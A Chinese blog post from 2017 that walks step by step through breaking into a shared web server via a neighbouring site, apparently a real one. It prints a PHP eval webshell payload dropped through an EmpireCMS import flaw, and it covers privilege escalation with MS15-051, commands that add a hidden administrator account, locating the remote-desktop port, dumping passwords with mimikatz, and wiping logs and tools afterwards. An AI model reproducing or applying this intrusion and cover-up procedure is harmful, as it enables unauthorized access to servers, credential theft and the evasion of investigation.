如何利用旁注渗透入侵服务器站点

作者: jekkay 分类: 漏洞挖掘 发布时间: 2017-05-28 23:24

1. 概述

 

旁注(旁站,其实是同一个意思),顾名思义,就是从旁边的站点注入,是渗透入侵常用的一种手段。通常,一台服务器上有很多个站点,这些站点之间没有必然的联系,是相互独立的,使用的是不同的域名(甚至端口都不同),但是它们却共存在一台服务器上。
如果我们要对某一个站点进行直接渗透无法突破时,那么我们可以对同服务器的其他站点进行渗透,只要能打破一个缺口,就能沦陷服务区上的整个站点,甚至是一个集群。
我们这次以实际的一个站点为例,简要阐述一下旁注的渗透原理及其危害。

 

2. 旁注渗透

我们这次以某站点www.xxxx168.com 为例, 阐述一下旁注的原理及其危害(请勿对实例站点进行攻击)

2.1 获取同服务器的旁站

我们打开某网站,其页面如下:

简单ping一下该网站,得到该网站的IP地址为 xxx.xxx.152.76.

 

打开IP反查域名网站,找出该IP上所绑定的域名信息,然后我们可以得到该IP上有6个域名绑定在上面。

 

2.2 寻找突破点

在上面的6个站点中,我们只要突破一个站点就可以把整个服务器拿下来。至于怎么找突破点,每个人都每个人的方法,只要你耐心寻找。比如,在上面的6个站点中,我发现有个站点采用的是帝国cms,而且后台是弱密码,我就直接进去了。

 

2.3 利用突破点拿shell

由于帝国cms系统模型中存在一个代码执行的漏洞,我们可以利用此漏洞拿到webshell。打开系统=>数据表与系统模型=》管理数据表=》管理系统模型

 

在本地新建一个文件,文本内容为<?fputs(fopen(“x.php”,”w”),”<?eval(\$_POST[cmd]);?>”)?> 再命名为1.php.mod。导入这个1.php.mod文件,数据表名写个tmpxxxx(注意别重复),然后就会执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件,即在路径e/admin/x.php。

 

我们使用菜刀连过去,测试一句话写入成功!

 

2.4 提权

使用菜刀发现无法执行cmd指令,应该设置了安全模式,所以我们得想个其他的办法:
·上PHP大马,无法执行 🙂
· 上ASP大马,还是无法执行 🙂
· 最后上ASPX大马,提示找不到文件,然后我们就上传cmd.exe到web目录下, 发现可以执行了,用户是service,还不是管理员,如下图所示:

我们查看一下系统的信息,发现是WIN2003的VPS, 应该是32位的机器

然后然后我们就上传32位的提权工具(MS15-051)上去(当然你可以用其他的提权工具),执行whoami,发现提权成功已经是system权限了。

然后分别执行一下两条命令,添加一个用户testabc,

net user testabc password /add
net localgroup administrators testabc /add

2.5 查找远程连接端口

在添加完用户之后,使用远程桌面工具(mstsc)无法连接,初步判断应该端口不是绑定在3389了,这时候我们得查找连接端口。
tasklist /svc
然后找到TermService进程对用PID为2060,如下图:

然后再找PID 2060所对应的端口号,执行一下命令:
netstat /ano | find 2060
最终找到该服务器的远程连接端口为65138.

2.6 获取管理员密码

使用远程桌面工具,连接上去,OK!

使用mimikatz工具(网上有很多一键抓取的工具都可以使用),抓取管理员的明文密码,如下:

 

2.7. 清除记录

清除记录一般有以下的内容:
1. Web日志
2. 删除木马,提权exp等工具
3. 删除测试账户testabc
4. 系统日志记录,如下图:


 

作者:胡杨<jekkay#easysb.cn><479904359#qq.com>
此文原出自【水穿石】: http://www.easysb.cn
如转载请标明原出处,谢绝阉割党。

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。